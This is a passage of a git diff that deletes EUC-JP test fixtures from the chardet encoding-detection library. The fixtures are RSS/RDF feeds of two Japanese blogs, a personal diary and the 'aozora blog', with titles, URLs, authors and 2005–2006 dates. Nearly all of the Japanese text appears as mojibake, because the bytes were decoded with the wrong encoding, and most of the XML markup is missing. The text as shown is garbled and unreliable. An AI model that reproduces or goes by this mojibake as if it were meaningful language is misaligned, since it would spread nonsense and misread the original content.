ֲ־₪ע־©₪ֶ₪כ₪ט₪¦₪ֻ₪·₪ֶ°₪¹‏₪א₪ף₪ַ₪¹¡£ ´י₪ע¾ו₪²₪כ₪ֳ₪ֶ₪₪₪¦₪«¡¢¹¢₪ע¿­₪׀₪¹₪ט₪¦₪ֻ₪ֳ₪ֶ₪₪₪¦₪«¡ִ¡£ ₪ַ¡¢÷£ֶ₪־¥¦¥ׁ₪¯₪ף₪ֿ₪·₪ֳ₪«₪ךµ¯־©₪·₪ֶ ¥ַ¥£¥¡¼₪ע³₪·₪ף₪ַ₪×₪ך₪₪·₪¿(¾׀) ₪ֳ₪ֶ₪«¡¢₪×¢₪¬₪₪ף´₪ֻ¸«₪¨₪כ₪«₪י ¥·¥³₪ױ₪ף₪¸₪ד₪ֳ₪¿₪ֳ₪ֶ´¶₪¸₪ַ₪¹₪ט₪ֽ(^o^;)... -¥¦¡¼¥ׁ¡¼¥כ¡¼¥ׁ¡¼°לָּ -michiyo -2005-11-10T20:43:40+09:00 - - - - \ No newline at end of file diff --git a/chardet/tests/EUC-JP/rdf.ycf.nanet.co.jp.xml b/chardet/tests/EUC-JP/rdf.ycf.nanet.co.jp.xml deleted file mode 100644 index 50a8290..0000000 --- a/chardet/tests/EUC-JP/rdf.ycf.nanet.co.jp.xml +++ /dev/null @@ -1,167 +0,0 @@ - - - - - -ando₪־¥¡¼¥¸₪־»¨µ­ִ¢ -http://www.ycf.nanet.co.jp/~dre/cgi-bin/diary/ -ando₪־¥¡¼¥¸₪־»¨µ­ִ¢ -ja - -2006-01-01T01:22:43+09:00 - - - - - - - - - - - - - - - - - - - - - - - - - -₪µ₪ְ₪₪µ₪· -http://www.ycf.nanet.co.jp/~dre/cgi-bin/diary/archives/000435.html -¿·ַ¯ֱב¡¹¡¢¡ײ₪×₪ה₪¸₪־°לָײִ¹₪₪ֶ¡׳₪ע¥־¡¼¥«¥ֳ¥ָ¡¢¥ױ¥כ¥³¡¼¥י¥¹₪ַ²־₪ֳ₪ֶ₪₪₪כ¡£ְ¸₪ַ²־₪¦₪־¡¢½י₪ב₪ֶ¸«₪¿¡£₪ה₪כ₪₪¢¡¢£־£ָ£ֻ¡£... -»הֵ×ֶµ­ -AND0 -2006-01-01T01:22:43+09:00 - - -₪¢₪±₪₪·₪ֶ₪×₪ב₪ַ₪ָ₪¦₪´₪¶₪₪₪₪¹ -http://www.ycf.nanet.co.jp/~dre/cgi-bin/diary/archives/000434.html -²¿₪ָ₪«¥ָ¥ֳ¥׳¥¡¼¥¸¹¹¿·¡£ ₪₪¼»¨µ­ִ¢₪¬¹¹¿·₪ַ₪­₪₪₪₪«₪ָ¸ְ₪¨₪׀¡¢²ףְ‏₪¬₪¬₪ף₪¬₪ףְ₪ל₪ֶ₪·₪₪¦₪«₪י₪ַ₪¹¡£ ₪ג₪¦₪¹₪°²ףְ‏₪¬ֹµ¢₪¹₪כ₪־₪ַ₪×ֲװ₪ֱ²¼₪µ₪₪¡£ ַ¯²ל¾ץ₪ַ₪׃₪ֳ₪¯₪ך₪·₪¿‎¡¢¶ֳ₪«₪»₪ֶ₪´₪ב₪ף₪₪µ₪₪¡£... -»הֵ×ֶµ­ -AND0 -2006-01-01T01:14:28+09:00 - - -£ף£כ£ש£נ£ו¼ֲ¸³ -http://www.ycf.nanet.co.jp/~dre/cgi-bin/diary/archives/000432.html -£ף£כ£ש£נ£ו₪ַ¡¢₪ֱ₪ח₪ֳ₪ָּµֳד₪¼ֲ¸³₪ע₪ה₪ֳ₪ֶ₪₪¿¡£ ₪³₪ֳ₪ֱ¡§£׳£י£מ£״£׀¡¡₪·₪«₪·²ףְ‏₪ֿ£¶£´£כ£ג£נ£ף ₪¢₪₪₪ֶ¡§£ֱ£ִ£׃£ּ¡¡£±£ֽ£ג£נ£ף¡¡₪·₪«₪·£׳£י£מ£ֽ£ו ₪ֹ₪ֳ₪ֱ₪ג¿ה¾©ָֿ°ֿ₪ַ₪ֿ₪₪₪¡£ ₪ִ₪₪°¡¦¡¦¡¦¡¦¡¦¡¦ְ®¸ש¡× ¸«»צ₪ְֲֻ³₪ַ₪­₪₪·₪¿¡£·כ¹½¹װ₪±₪כ₪¾¡¢£ף£כ£ש£נ£ו¡£... -»הֵ×ֶµ­ -AND0 -2005-12-15T00:47:29+09:00 - - -¥¥¦¥ף¥ֶ¥ף₪־₪·₪כ₪³¥¹¥ׁ -http://www.ycf.nanet.co.jp/~dre/cgi-bin/diary/archives/000433.html -°ת₪ֳ±₪·₪גֽמ₪ֱֳו₪­¡¢₪₪¼₪«ֱֶֽ³¥¥¦¥ף¥ֶ¥ף₪ֻ¹װ₪­₪¿₪¯₪₪כ¡£ µ₪ֻ»׳₪₪־©₪ֳ₪¿₪־₪ַ¡¢ֶ±¹װ¼װ₪עֽ¶₪¦₪³₪ָ₪₪¯¡¢°ל¿ֽ₪ֵַ׀»³¸‎₪״¡£ ֵ¹₪־ֱ°₪ַ¡¢ֹװ»׳µִ₪ֶָ¬₪־ֳז₪ֻ₪·₪כ₪³¥¹¥ׁ₪¬ֹג₪«₪ײ¡£ »׳₪₪ְ₪ֳ₪ֶ¥·¥§¥כ¥ּׁµ₪·₪ֳַם¸¡¦¡¦¡¦₪¿₪₪כ¡¦¡¦¡¦₪¦₪₪₪¡×¡× ּֽ₪ֻ´ֵ₪₪¬־‎₪ך¹‏₪ף₪ַ₪₪₪₪₪₪¿₪ב¡¢¸«₪¿ּ₪ט₪ך₪ג₪¢₪ֳ₪µ₪ך₪·₪ֶ₪₪₪כ¡£ ₪½₪¦₪₪₪¨₪׀¡¢ְ־¡¢¾®ֱֻׂץֳד¥¹¥ׁ₪ִֻ©ְן₪·₪¿₪ָ₪­¡¢₪¢₪ף₪³₪¬ּµ₪¯₪₪ֳ₪¿»‏ְֵ₪ֱַרֶס₪·₪¿₪³₪ָ₪ע»׳₪₪½׀₪·₪¿¡£ ₪³₪־¥ׁ¥¹¥¿¡¢»ה₪־ֳז₪ַ₪ֿ¥ֱ¥ד¥ל¥ף¥¸¥ב¥ֻ¥ו¡¼₪ַ₪ֿ₪₪¯¡¢ִךָײ₪ָ₪·₪ֳֶם¸₪ַ₪­₪½₪¦₪µ₪₪¬₪¹₪כ¡£... -»הֵ×ֶµ­ -AND0 -2005-12-14T02:56:04+09:00 - - -µ¡´ן³־ַ§ -http://www.ycf.nanet.co.jp/~dre/cgi-bin/diary/archives/000431.html -°ת₪ֳ±₪·ְט₪־µ¡´ן₪־³־ַ§¡£ ₪₪ְ»ָ₪ֳ₪ֶ₪₪₪₪«₪ֳ₪¿¿©´ןְצ₪₪µ¡₪ָ¥¬¥¹°ב־א´¥ֱחµ¡₪ְָצֲץµ¡₪־¥ֶ¥¹¥ָ¡£ ְצֲץµ¡₪ָ°ב־א´¥ֱחµ¡₪ֿ¡¢₪¹₪´₪₪ְ­ַ½¡£₪·₪«₪ג¥¬¥¹ֲו·׳»»₪·₪¿₪י£±£¶±¡£°ֲ₪₪¡£ ₪·₪«₪·¡¦¡¦¡¦¿©´ןְצ₪₪µ¡₪ֿ»‏´ײ₪«₪«₪ך₪¹₪®¡£₪ִ₪₪₪ַ₪ֻ¸ְ₪¦₪ֵֵָµ₪¿©₪₪²ב₪®¡£ ₪³₪ל₪ֿ¥₪¥¥₪¥ֱ₪ְ₪ֳ₪¿¡£₪µ₪¹₪¬¥¥·¥ח¥¥כ¡£... -»הֵ×ֶµ­ -AND0 -2005-12-12T23:24:59+09:00 - - -°ת₪ֳ±₪·´°־» -http://www.ycf.nanet.co.jp/~dre/cgi-bin/diary/archives/000430.html -°ת₪ֳ±₪·´°־»¡£₪·₪«₪·¥ֽ¥ֳ¥ָ³«ִּֽ½ִך₪ּֿ₪ִך¡£ ₪ָ₪ך₪¢₪¨₪÷»ֳִך²ףְ‏₪ֿ³־¡£₪·₪«₪·£¶£´£כ¡£ ₪·₪«₪ג¡¢₪₪¼₪«¥ב¡¼¥כ₪¬·ׂ₪¬₪י₪₪₪¡£... -»הֵ×ֶµ­ -AND0 -2005-12-11T20:42:04+09:00 - - -°ת₪ֳ±₪·½אָק -http://www.ycf.nanet.co.jp/~dre/cgi-bin/diary/archives/000429.html -₪ָ¸ְ₪ֳ₪ֶ₪ג¡¢÷­ס₪×ַ₪₪»₪ַ₪×´ך₪₪₪·₪ֶ₪₪₪כ₪־₪ַ¡¢¾²₪־¾ו₪ֻ»¶₪י₪׀₪ֳ₪¿₪ג₪־₪־ְ°ֽ‎₪ָ¡¢°ת₪ֳ±₪·²°₪־ֵ¨¡¢ֵֵµ₪ְַ‏₪־¼ט₪ך₪₪÷₪·₪¬¥ב¥₪¥ף¡£ ֳֶ₪ֻ²ז₪¬²ָ₪ֿ¡¢¥¢¥ף¥ֶ¥¥±¡¼¥ײ¥כ₪¬₪ָ₪°₪ם₪ע´¬₪₪₪ֶ₪₪₪כ₪־₪ָ¡¢ֳֵֵֿ·ֿ₪¬£ף£כ£ש£נ£וֽׁ¥״¥ֳ¥ֹ¥»¥ֳ¥ָ₪ע²‏ֲ₪₪·₪ֶ¥פ¥£¥ל¥ֳ¥¸¥׀¥ף¥¬¡¼¥ֹ₪ַַד₪ֳ₪¿ֳֵֵֿµ¡₪ֻ·ׂ₪₪₪ַ₪₪₪כ₪־₪ַ¡¢₪³₪ל₪ְ₪±₪ְֿהֲ׀₪ֻ³°₪·₪ֶ₪×₪₪₪ֶ₪¯₪ְ₪µ₪₪₪ַָ°₪ע²¡₪µ₪ל₪¿¡£ »ָ₪¨₪₪₪¥´¥₪גֲ¿₪₪₪¬¡¢₪ָ₪ך₪¢₪¨₪÷¿·µן₪ֻ»‎₪ֳ₪ֶ¹װ₪¯¡£¥ה¥ױ¥×¥¯₪ַַה₪כ₪«₪₪¡¡£... -»הֵ×ֶµ­ -AND0 -2005-12-05T23:16:19+09:00 - - -¥ָ¥ֳ¥׳¥¡¼¥¸¹¹¿· -http://www.ycf.nanet.co.jp/~dre/cgi-bin/diary/archives/000428.html -ֱ°²ף₪«₪י£±¥צ·מ¼ו₪ַ¡¢¥ָ¥ֳ¥׳¥¡¼¥¸¹¹¿·¡£ ₪₪ס¢¥ָ¥ֳ¥׳₪ֻ½ס₪₪₪¿₪ָ₪×₪ך¡¢₪·₪׀₪י₪¯¥¢¥¯¥»¥¹ֹװ²ִ₪ֻ₪₪כ²ִַ½ְ­₪¬₪¢₪ך₪₪¹₪¬₪´־»¾µ´ך₪₪₪₪¹¡£ ּ²₪₪¡¦¡¦¡¦¿²₪₪¹¡£... -»הֵ×ֶµ­ -AND0 -2005-12-02T03:41:38+09:00 - - -¥¬¥ף¥ְ¥א₪־£ֳ£ֽ¡ְ¸¶¨₪־ַעְ׀₪µ₪ף¡ֻ -http://www.ycf.nanet.co.jp/~dre/cgi-bin/diary/archives/000427.html -´´ײ¸ֲִך¥ֽ¥¿¡£ ¥¬¥ף¥ְ¥א₪־£ֳ£ֽ¡¢ְ¸¶¨₪־ַעְ׀₪µ₪ף¥׀¡¼¥¸¥ח¥ף¡¢£±£±¡¿£³£°₪₪ַ₪־´´ײ¸ֲִך¸ר³«¡£ £ֳ£ֽ¸«₪ל₪₪₪¿ֽ₪ג₪³₪ל₪₪י°ֲ¿´¡£ ¸ִ¿ֵֽ×₪ֻ₪ֿ¡¢¥¡¼¥¸±¦ֲ¦₪־₪ׂ₪ָ₪³₪ָ¥«¡¼¥ֹ₪־‎₪¬±ֱַ₪ט₪ך₪גַּּע₪₪¡£... -etc -AND0 -2005-11-23T00:04:15+09:00 - - -¥׳¥י¥ֱ¥³־ִך -http://www.ycf.nanet.co.jp/~dre/cgi-bin/diary/archives/000426.html -₪₪₪ה¡¢ֹּ¸₪ֻ₪ֿ₪·₪ֶ₪¿₪ף₪ְ₪±₪ֹ¡¢₪₪µ₪«£±£±·מ₪ֳֻ£ְ®₪ַ₪­₪כ₪ָ₪ֿ¡¦¡¦¡¦ £ֱ£־£ֱ¥׳¥י¥ֱ¥¥ב¥ף¥׀¡¼¥÷ֳ£ְ®¡£¡₪·₪«₪ג¹סֶגְ‏₪־₪¡ֻ ¥¹¥¿¡¼¥¢¥י¥₪¥¢¥ף¥¹¥´¡¼¥כ¥ֹ₪ג₪ִ₪₪₪ֶ₪¯₪כ¡£ °ל»³ִ¶₪¨₪¿´¶₪¸¡£... -»הֵ×ֶµ­ -AND0 -2005-11-22T01:53:21+09:00 - - -¥¦¥£¥כ¥¹ -http://www.ycf.nanet.co.jp/~dre/cgi-bin/diary/archives/000425.html -÷ַ¶בֶ°₪­₪¬ֶ₪₪¡£₪ָ»׳₪ֳ₪ֶ¡¢¥־¡¼¥ָ¥ף¥¢¥ף¥ֱ¥¦¥£¥כ¥¹µ¯ֶ°₪·₪ֶ¡¢¼ךֶ°₪ַ¸¡÷ק₪·₪¿₪י¡¦¡¦¡¦ £´ֹ₪ָ¯¸«¡£ ³טֶ°₪ֿ₪·₪ֶ₪₪₪₪«₪ֳ₪¿₪ט₪¦₪ְ₪¬¡£ ₪·₪«₪·¡¢₪₪ף₪ַ¼«ֶ°¸¡½׀₪ַ₪­₪₪«₪ֳ₪¿₪־₪ְ₪ם₪¦¡¦¡¦¡¦¡¡¥­¥ף¥°¥½¥ױ¥ָ₪ֻ¾ט₪ך´¹₪¨₪כ₪«₪¡£... -»הֵ×ֶµ­ -AND0 -2005-11-21T23:46:36+09:00 - - -ּ¾¸ֵ²°³¹ֳז¥¥׃ -http://www.ycf.nanet.co.jp/~dre/cgi-bin/diary/archives/000424.html -״ֽר₪¥µ¥₪¥ָָ¯¸«¡£ ₪³₪ל₪ע»ָ₪¨₪׀¡¢ֳ¯₪«₪ע°ֶֶג₪¹₪כ₪־₪¬₪ָ₪ֶ₪ג³₪ְ¡£... -etc -AND0 -2005-11-18T01:13:58+09:00 - - -¥¹¥ֶ¡¼¥­₪ַ₪¢₪ֳ₪ֶ¥¹¥ֶ¡¼¥­₪ַ₪₪₪ -http://www.ycf.nanet.co.jp/~dre/cgi-bin/diary/archives/000423.html -¸רְµ¼ט°ת°ׁ°ק²ס¡¢¥¹¥ֶ¡¼¥­²°¡ײ¥ױ¥©¥כ¥¯¥¹¡׳₪ֲֻ׀₪·₪ֶַ׃½ּ¿־ב¡£ µם₪־ְ®·¿ֶש¡µם₪־ְ¸ֶש¡₪»י¿ֵָש₪ע¿ֽ¹©ֵ×₪ֻ·כֳו₪·¡₪·ֱ¾ץ₪עְ°₪¨₪¿₪ג₪־¡ֻ₪ע¡ײ¥¹¥ֶ¡¼¥­¡׳₪ָ₪·₪ֶַה₪ֳ₪ֶ₪₪₪¿₪½₪¦₪¡£ ₪½₪¦₪₪₪¨₪׀¡¢¥¹¥ֶ¡¼¥­₪־₪¢₪µ₪¯₪₪ֻ₪ג¡¢¡ײ³״ְ¸¥¹¥ֶ¡¼¥­¡׳₪ָ¾־₪·₪¿¡¢»ק₪¿₪ג₪־₪¬₪¢₪ֳ₪¿₪₪¡¡£₪³₪ֳ₪ֱ₪ֿ¥ב¥ֻ¥ו¡¼₪ֻ¹חְ®ֶש₪ֳ₪₪₪₪³₪ָ₪¬½ס₪₪₪ֶ₪¢₪ֳ₪¿₪«₪י₪®₪ך₪®₪ך¥»¡¼¥ױ₪«¡¢₪ָ»׳₪ֳ₪¿₪י¡¦¡¦¡¦ ¡ײ³״ְ¸¥׀¡¼¥°¡׳¡¡¡¡(¥¡¥) ₪₪ף₪ָ¡¢₪₪₪ִ₪־´ײ₪ֻ₪«ּ¾¾־₪¬ׁ₪ן₪ֳ₪ֶ₪₪₪כ¡£... -etc -AND0 -2005-11-17T21:43:50+09:00 - - -¹גֲ®ֶ»ֿ©µ»½ׁ¥»¥ף¥¿¡¼ -http://www.ycf.nanet.co.jp/~dre/cgi-bin/diary/archives/000422.html -¹גֲ®ֶ»ֿ©µ»½ׁ¥»¥ף¥¿¡¼₪ָ₪₪₪¦₪ָ₪³₪ם₪«₪י¡¢₪ן₪׃¾ץ₪¬₪ה₪ֳ₪ֶ₪¯₪כ¡£ ֹץ₪ע³«₪±₪כ₪ָ¡¢ֵלֶֻ¡¿ְ¾ֶֻ¡¿ֳזֶֻ¹גֲ®ֶ»ֿ©²ס¼ׂ₪ָֿ¢ּ¾¡£ ¥¢¥ף¥±¡¼¥ָ¥µ¥₪¥ָ₪ֻ£׃£׃£ּ₪ע₪ִ₪±ֻ÷₪ל₪¿₪³₪ָ₪ֲֻ׀₪¹₪כ₪ן₪׃¾ץ₪ָ₪ָ₪ג₪ֻ¡¢£ׁ£ױ£ֿ¥«¡¼¥ֹ£µ£°£°±¬₪¬ֶ‏₪ֳ₪ֶ₪₪₪¿¡£ ₪ה₪ֳ₪¿₪³₪ָ₪ָֽֿ₪׃ֲִ₪־¥׀¥י¥ף¥¹₪¬¼ט₪ל₪ֶ₪₪₪¿₪־₪ָ¡¢₪ן₪׃¾ץ₪¬ֱב₪«₪ֳ₪¿₪³₪ָ₪«₪י¡¢÷£²ף₪ֹֿװּה₪ֻ½ט₪¹¡¾׀¡ֻ... -»הֵ×ֶµ­ -AND0 -2005-11-01T00:42:27+09:00 - - -ֲחµ¬ּֿ²‏ֲ₪ -http://www.ycf.nanet.co.jp/~dre/cgi-bin/diary/archives/000421.html -£ִ£ֹ£ֿ£־₪ֻ»ִ₪ֳ₪ֶ₪₪₪¿¥¡¼¥¸₪ע¡¢°ל³ח÷ן½₪·₪₪·₪¿¡£ £±¥צ·מ₪₪ֹ₪ֵֿ¾ֱקְִך₪·₪ֶ₪¢₪ך₪₪¹₪¬¡¢ֵ¾ֱק₪¬ֽמ₪ֱֳו₪₪₪¿»‏ְֵ₪ַ£ִ£ֹ£ֿ£־₪־¥¡¼¥¸₪ֵֿ±ֲאֽ½ִך₪ַ₪¹¡£... -»הֵ×ֶµ­ -AND0 -2005-10-28T02:46:13+09:00 - - - - \ No newline at end of file diff --git a/chardet/tests/EUC-JP/siesta.co.jp.aozora.xml b/chardet/tests/EUC-JP/siesta.co.jp.aozora.xml deleted file mode 100644 index bfdb310..0000000 --- a/chardet/tests/EUC-JP/siesta.co.jp.aozora.xml +++ /dev/null @@ -1,877 +0,0 @@ - - - - - -aozora blog -http://www.siesta.co.jp/aozora/ -¥₪¥ף¥¿¡¼¥ֽ¥ֳ¥ָ₪־ֵֵ»ׂ¿½ס´¡ײְִ¶ץ¸¸ֻ¡׳₪ֻ´״ֿ¢₪¹₪כblog₪ַ₪¹¡£ -ja - -2006-01-03T21:20:37+09:00 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 06¡§²בµמ₪־¡ײ¿·ֳו¾נף°לֽק¡׳₪ע¸«₪¿₪₪₪־₪ַ₪¹₪¬¡£ -http://www.siesta.co.jp/aozora/archives/002468.html - -ֵת₪¨¡§°²¼₪־URL₪עִ¾ְ»״ִך₪¹₪כ₪ָ¡¢¸«₪כ₪³₪ָ₪¬₪ַ₪­₪₪¹¡£

    - -

    http://www.aozora.gr.jp/index_pages/whatsnew_yyyy_1.html

    - -

    yyyy₪ֿ¡¢ְ¾־ס4·ו₪ַ₪¹¡£2005ַ¯¬₪ַ₪¢₪ל₪׀
    -http://www.aozora.gr.jp/index_pages/whatsnew_2005_1.html
    -₪ָ₪₪ך₪₪¹¡£
    -₪³₪ל₪ַ¡¢₪½₪־ַ¯₪־÷ַ¿·₪־¿·ֳו¾נף₪¬³«₪­₪₪¹¡£
    -÷ַ¿·°³°₪־¿·ֳו¾נף₪ֿ¡¢¥¡¼¥¸¾וֹפ₪־¥ך¥ף¥¯₪«₪י₪¿₪ֹ₪ֳ₪ֶ₪¯₪ְ₪µ₪₪¡£

    - -

    ₪₪ס¢2000ַ¯°ֱ°₪־¿·ֳו¾נף₪ֿ¡¢₪³₪־‎ֻ¡₪ַ₪ֿ»²¾ָ₪¹₪כ₪³₪ָ₪¬₪ַ₪­₪₪»₪ף¡£
    -²בµמ₪־¡ײ₪½₪י₪ג₪ט₪¦¡׳₪ַ³־ַ§₪·₪ֶ₪¯₪ְ₪µ₪₪¡£
    -¡ײ₪½₪י₪ג₪ט₪¦¡׳₪־₪₪₪ֱ₪׀₪ף²¼₪ֻ¡¢²בµמ₪־¡ײ₪½₪י₪ג₪ט₪¦¡׳₪״₪־¥ך¥ף¥¯₪¬₪¢₪ך₪₪¹¡£

    ]]> - -
    -aozora_Q&A -LUNA CAT -2006-01-03T21:20:37+09:00 -
    - -ֲ‎ַמ»־ -http://www.siesta.co.jp/aozora/archives/002467.html - -¥¿¥³₪ַ₪¹¡£
    -ְµ·מ₪ְ₪«₪י¡¢ֹקַמ»־₪ֻ¾ֿµַמ»־₪ְ₪ָ₪ַ₪¹¡£
    -¥¿¥³₪ַ₪¹¡£
    -¢₪¬₪¹₪¯₪ָ¡¢₪¸₪ײ₪ף₪־ֲ­₪ַ₪ג¿©₪₪כ₪ָ₪ַ₪¹¡£
    -¥¿¥³₪ַ₪¹¡£
    -µד₪­₪₪¬₪י¡¢µ₪₪₪ִ₪«₪»₪ֶ₪ג₪י₪ֳ₪¿₪³₪ָ₪¬₪¢₪כ₪ָ₪ַ₪¹¡£
    -¥¿¥³₪ַ₪¹¡£
    -₪³₪ל₪ַ₪ג¡¢°­ֻג₪־₪ִ₪ג₪ך₪ְ₪ָ₪ַ₪¹¡£
    -¥¿¥³₪ַ₪¹¡£
    -₪¿₪₪¿₪¡¢₪«₪¼₪ֿ₪«₪»₪ָ₪₪₪ֳ₪·₪ח₪ֻ¾ט₪ֳ₪ֶ₪₪₪¿₪ָ₪ַ₪¹¡£
    -ֿ׃½½»ת¡£¥ֿ¥ֳ¥¹¥כ¡¢¥ֿ¥ֳ¥¹¥כ¡£
    -¥¿¥³₪ַ₪¹¡¢¥¿¥³₪ַ₪¹¡¢¥¿¥³₪ַ₪¹¡ִ¡ִ

    - -

    ¥¿¥³₪־ֶ¬₪ֻ₪ֿ₪ֱ₪₪­´¬₪₪₪ֶ¡¢₪­₪ו¡¼₪ֳ₪ָ₪·₪ב₪¿₪י¡¢₪·₪₪י₪₪₪¢צ
    -ְֵֵ‏₪ִֻ»¥₪¥ף¥ױ¥כ¥¨¥ף¥¶¡£₪×₪ֳ₪ָ₪ֳ₪ָ₪ֳ₪ָ¡£₪¢₪₪₪־»ׂ¥ך¡¼₪ְ¡£
    -ְֱֵג₪־¥ן¥ף¡¦¥¥₪¥ָ¡¦¥«¡¼¥ֻ¥׀¥כ¡£¥י¥ײ¡¦¥¥·¡¼¥ף¡£
    -₪×₪¯₪µ₪ף¡¢¥¨¥ם¥ך¥¹¥ָ¡¢¥¥₪¥¢¥ׂ¡¢¥¥³¥ך¥¥₪¥ָ¡¢»³ְמ₪ַ₪¹¡£
    -³ֶ®µ»₪ֿ¥ױ¥£¥¯¥·¥ח¥ף₪ְ¡£¸‎¥ׁ¥¯¡¦¥«¥י¥×¥±₪ֿ¥ֹ¥­¥ו¥ב¥ף¥¿¥ך¡¼₪ְ¡£
    -¥ֻ¡¼¥ָ₪«¡¢°לµי·תֳ»־₪«¡£₪½₪ל₪¬ּהֲך₪ְ¡£
    -£ָ£ַ¡HaGe¡ֻ¥ל¡¼¥¶¡¼¥׳¥ך¥ף¥¿¡¢₪ױ₪©¡¼¡£
    -ֲֻֽמ₪»₪ט¡£
    -by ₪א₪ֶ₪­₪ף₪°¡ק¥¿¥ִ¥־¥³
    -

    ]]> -

    ¡צ¡צ¡צ


    -װֲ₪¹©÷מַָ

    - -

    ֹקַמ»־
    -÷ה¸‎°ֲ¸ד
    -¡¡
    -¡¡
    -¡¡½פ·¯₪ֿ¡¢ֵלµ‏»װֻ¿ִ®ֻ¿ָײֳֿ₪₪כֹקַמ»־₪־ֵ¡ֲנ₪ע₪´₪¾₪ף₪¸₪ַ₪¢₪ם₪¦₪«¡©¡¡₪´₪¾₪ף₪¸₪₪₪¡£₪½₪ל₪ֿ₪¿₪₪₪״₪ף»ִַ°₪ַ₪¢₪כ¡£₪½₪·₪ֶ½פ·¯₪ֿ°־ֲח₪₪כֹקַמ»־₪ע₪´₪¾₪ף₪¸₪ַ₪¢₪ם₪¦₪«¡©¡¡₪₪₪¡£₪¢₪¢¡£₪ַ₪ֿ½פ·¯₪ֿ°ה½ס₪ְ₪±₪¬ָ¯¸«₪µ₪ל₪ֶ¡¢°־ֲח₪₪כֹקַמ»־₪¸₪¿₪₪₪ֿג¡₪ט₪¦¡ֻ₪ָ₪·₪ֶ¶¼÷₪·₪¿₪³₪ָ₪ג₪´₪¾₪ף₪¸₪₪₪₪ַ₪¢₪ם₪¦₪«¡©¡¡₪₪₪¡£₪¢₪¢¡£₪ַ₪ֿ½פ·¯₪ֿ₪₪¯₪¬₪½₪־¶₪־·שµ¿₪־₪¿₪ב₪ֲֻ¡¹₪₪י₪ּ÷₪ֶס₪ע´¶₪¸₪ֶ₪₪₪כ₪³₪ָ₪ג₪´₪¾₪ף₪¸₪¢₪כ₪₪₪¡£₪·₪«₪··»¡₪ֳֿ־₪ֳ₪ֶ₪₪₪¿₪־₪ַ₪¢₪כ¡£₪½₪·₪ֶ₪½₪־¶₪־·׳»»₪ֻ₪ט₪ל₪׀¡¢°־ֲח₪₪כֹקַמ»־₪ֿ₪₪¯₪ָ¶¦ֵֻ₪־₪¦₪¨°ה½ס₪עװֲ₪¡₪ֽ₪ִ₪¾₪¦¡ֻ₪·₪ֶ¼«»¦₪ע₪ט₪½₪×₪₪¡¢₪«₪¯₪ֶ₪«₪־ֱ‏₪א₪₪­¥¿¥³ַמ»־₪־ּ¾ְֽ´‏ֲ»₪ע₪¿₪¯₪י₪ף₪ְ₪ֱֻך°ד₪¢₪כ₪₪₪₪ָגֻ¡₪ֻ₪י¡ֻ₪ף₪ְ₪־₪ַ₪¢₪כ¡£½פ·¯¡¢₪³₪ל₪ֿ₪¢₪­₪י₪«₪ֻ¸ם²ע₪ַ₪¢₪כ¡£₪₪ף₪ָ₪₪ל₪׀°־ֲח₪₪כֹקַמ»־₪ֿ¼«»¦₪·₪¿₪«₪י₪ַ₪¢₪כ¡£₪ֿ₪¿₪·₪ֶ¼«»¦₪·₪¿₪«¡©¡¡₪·₪«₪ך¡¢°־ֲח₪₪כֹקַמ»־₪ֿ¶¼÷₪·₪¿₪־₪ַ₪¢₪כ¡£½פ·¯₪ֿ·־¨₪ֻ¿¿ֽ‎₪עµ¿₪ֳ₪ֶ₪₪₪₪₪־₪ַ₪¢₪ם₪¦₪«¡©¡¡₪₪¼₪₪י₪׀¡¢₪½₪ל₪ֿ½פ·¯₪־ְ¸³¶₪ֻ₪µ₪₪¶₪₪ֹװ±¿₪ע₪ג₪¿₪י₪¹₪ֱֻך°ד₪₪₪₪«₪י₪ַ₪¢₪כ¡£¿¿ֽ‎₪ֿ¿®₪¼₪י₪כ₪₪­ְ­¼ֱ₪־₪ג₪־₪ַ₪¢₪כ₪«₪י¡¢½פ·¯₪ֿ°־ֲח₪₪כֹקַמ»־₪־»א₪ע¿®₪¸₪₪±₪ל₪׀₪₪י₪₪₪¡£₪½₪·₪ֶ½פ·¯₪ֿ¡¢₪«₪־ֱ‏₪א₪₪­¥¿¥³ַמ»־₪־¡½¡½₪¢¡¢½פ·¯₪ֿ₪«₪־ֱ‏₪א₪₪­¥¿¥³ַמ»־₪ע₪´₪¾₪ף₪¸₪ַ₪¢₪ם₪¦₪«¡©¡¡₪´₪¾₪ף₪¸₪₪₪¡£₪¢₪¢¡¢₪½₪ל₪ֿ₪¿₪₪₪״₪ף»ִַ°₪ַ₪¢₪כ¡£₪ַ₪ֿ½פ·¯₪ֿ¡¢₪₪÷ָבִֻ₪₪כֹקַמ»־₪־°ה½ס₪ע°לֶֹ₪·₪₪±₪ל₪׀₪₪כ₪₪₪¡£

    - -

    ¡¡¡¡¡¡¡¡ֹקַמ»־₪־°ה½ס
    -¡¡½פ·¯¡¢ָא₪ֿ¥ֿ¥²₪¢₪¿₪₪ַ₪¢₪כ¡£₪·₪«₪ך¡¢ָא₪ֿ¥ֿ¥²₪¢₪¿₪₪ַ₪¢₪כ¡£¥ֿ¥²₪¢₪¿₪°³°₪־₪₪ֻ₪ג₪־₪ַ₪ג¡¢₪ְ₪ף₪¸₪ֶ₪³₪ל₪¢₪כ₪ֿ₪÷₪ֿ₪₪₪¡£ָא₪ֿ¥«¥ִ¥י₪ע₪ג₪ֳ₪ֶַ·₪־±£ֳ¡₪₪₪ף₪₪₪¡ֻ₪ע₪₪·₪×₪כ₪־₪ַ₪¢₪כ¡£₪¢₪¢₪³₪ל₪¸₪ִ₪ֻ²¿₪¿₪כ₪³₪ֳ₪±₪₪¡×¡¡₪·₪«₪ך²¿₪¿₪כ₪³₪ֳ₪±₪₪₪ַ₪¢₪כ¡£₪¢₪¢²¿₪¿₪כ₪³₪ֳ₪±₪₪₪ַ₪¢₪כ¡£₪«₪ך₪ֻ½פ·¯¡¢°ל·ג₪ע₪¯₪ן₪¨₪ֶָא₪־ּ׃ָ±₪ע¶¯ֳ¥₪»₪ך₪ֱֱָ₪·₪¿₪₪¨¡£₪ָ₪ִ₪¸₪ח½פ·¯₪ֿµ₪ְה₪»₪ף₪ָ₪¹₪כ₪־₪ַ₪¢₪כ¡£₪·₪«₪·₪ֶ½פ·¯₪ֿµ₪ְה°³°₪־₪₪ֻ₪ג₪־₪ֻ₪גֱר¶ר₪¹₪כ₪³₪ָ₪ֹֿװ²ִַ½₪ַ₪¢₪כ¡£₪¹₪₪ן₪ֱ½פ·¯₪ֿ¡¢א׀ךר¡₪ן₪₪₪»₪ִ¡ֻּ¾¾ץ₪¹₪₪«₪י₪¶₪כּµּ׃ְײ¿§₪־ֶֽµ¯ֲ־₪ֻ¿¼₪¯¿´ע°₪עֲַ₪¿₪כ₪כ₪ַ₪¢₪ם₪¦¡£°